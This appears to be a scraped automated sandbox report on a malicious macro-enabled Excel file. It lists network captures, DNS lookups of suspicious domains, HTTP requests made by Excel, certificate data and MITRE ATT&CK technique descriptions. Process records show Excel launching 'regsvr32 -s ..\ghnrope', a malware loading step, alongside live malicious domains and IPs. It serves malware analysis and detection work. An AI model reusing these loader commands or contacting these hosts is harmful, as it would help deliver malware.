Apr 9, 2021 16:26:09.219535112 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:09.219578981 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:09.219609976 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:09.219742060 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.261780024 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.427109003 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:09.427304983 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.482625008 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:09.684092999 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:10.011995077 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:10.012166023 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:10.013170958 CEST	443	49170	67.222.38.97	192.168.2.22
Apr 9, 2021 16:26:10.013259888 CEST	49170	443	192.168.2.22	67.222.38.97
Apr 9, 2021 16:26:10.056150913 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.229902029 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.230027914 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.231112957 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.407638073 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.408183098 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.408226013 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.408262014 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.408288002 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.408302069 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.408400059 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.412345886 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.412379980 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.412415981 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.413466930 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.445882082 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.623797894 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.624041080 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.677356958 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.891371012 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.950721979 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.950776100 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:10.951020956 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:10.951967955 CEST	49171	443	192.168.2.22	173.201.252.173
Apr 9, 2021 16:26:11.126899004 CEST	443	49171	173.201.252.173	192.168.2.22
Apr 9, 2021 16:26:40.013493061 CEST	443	49170	67.222.38.97	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 9, 2021 16:26:04.144747972 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:04.394287109 CEST	53	52197	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:04.842117071 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:05.853120089 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:05.866938114 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:06.302876949 CEST	52838	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:06.315668106 CEST	53	52838	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:07.186991930 CEST	61200	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:07.199321032 CEST	53	61200	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:07.205514908 CEST	49548	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:07.217546940 CEST	53	49548	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:07.737262964 CEST	55627	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:07.755867004 CEST	53	55627	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:07.763899088 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:07.782650948 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:08.710443020 CEST	61865	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:08.884838104 CEST	53	61865	8.8.8.8	192.168.2.22
Apr 9, 2021 16:26:10.031708002 CEST	55171	53	192.168.2.22	8.8.8.8
Apr 9, 2021 16:26:10.052361965 CEST	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 9, 2021 16:26:04.144747972 CEST	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	runolfsson-jayde07s.ru.com	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:04.842117071 CEST	192.168.2.22	8.8.8.8	0xc896	Standard query (0)	cremin-ian07u.ru.com	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:05.853120089 CEST	192.168.2.22	8.8.8.8	0xc896	Standard query (0)	cremin-ian07u.ru.com	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:06.302876949 CEST	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	shalombaptistchapel.com	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:08.710443020 CEST	192.168.2.22	8.8.8.8	0x8c19	Standard query (0)	cesiroinsurance.com	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:10.031708002 CEST	192.168.2.22	8.8.8.8	0xdfb5	Standard query (0)	innermetransformation.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 9, 2021 16:26:04.394287109 CEST	8.8.8.8	192.168.2.22	0x1168	No error (0)	runolfsson-jayde07s.ru.com	8.211.4.209	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:05.866938114 CEST	8.8.8.8	192.168.2.22	0xc896	No error (0)	cremin-ian07u.ru.com	8.211.4.209	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:06.315668106 CEST	8.8.8.8	192.168.2.22	0x2c09	No error (0)	shalombaptistchapel.com	162.251.80.27	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:08.884838104 CEST	8.8.8.8	192.168.2.22	0x8c19	No error (0)	cesiroinsurance.com	67.222.38.97	A (IP address)	IN (0x0001)
Apr 9, 2021 16:26:10.052361965 CEST	8.8.8.8	192.168.2.22	0xdfb5	No error (0)	innermetransformation.com	173.201.252.173	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

runolfsson-jayde07s.ru.com

cremin-ian07u.ru.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	8.211.4.209	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 9, 2021 16:26:04.429071903 CEST	0	OUT	GET /ind.html HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: runolfsson-jayde07s.ru.com Connection: Keep-Alive
Apr 9, 2021 16:26:04.824918032 CEST	1	IN	HTTP/1.1 503 Service Unavailable Date: Fri, 09 Apr 2021 14:26:04 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 76 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	8.211.4.209	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 9, 2021 16:26:05.889586926 CEST	2	OUT	GET /ind.html HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: cremin-ian07u.ru.com Connection: Keep-Alive
Apr 9, 2021 16:26:06.271588087 CEST	2	IN	HTTP/1.1 503 Service Unavailable Date: Fri, 09 Apr 2021 14:26:05 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 76 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 9, 2021 16:26:06.662359953 CEST	162.251.80.27	443	192.168.2.22	49167	CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 9, 2021 16:26:06.662359953 CEST	162.251.80.27	443	192.168.2.22	49167	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 9, 2021 16:26:09.219609976 CEST	67.222.38.97	443	192.168.2.22	49170	CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 9, 2021 16:26:09.219609976 CEST	67.222.38.97	443	192.168.2.22	49170	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 9, 2021 16:26:10.412345886 CEST	173.201.252.173	443	192.168.2.22	49171	CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1820 Parent PID: 584

General

Start time:	16:25:34
Start date:	09/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fc30000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2376 Parent PID: 1820

General

Start time:	16:25:43
Start date:	09/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s ..\ghnrope
Imagebase:	0xff110000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2032 Parent PID: 1820

General

Start time:	16:25:44
Start date:	09/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s
Imagebase:	0xff110000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2312 Parent PID: 1820

General

Start time:	16:25:44
Start date:	09/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s
Imagebase:	0xff110000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 284 Parent PID: 1820

General

Start time:	16:25:44
Start date:	09/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s
Imagebase:	0xff110000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2668 Parent PID: 1820

General

Start time:	16:25:45
Start date:	09/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s
Imagebase:	0xff110000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report documents-1819557117.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "documents-1819557117.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 1820 Parent PID: 584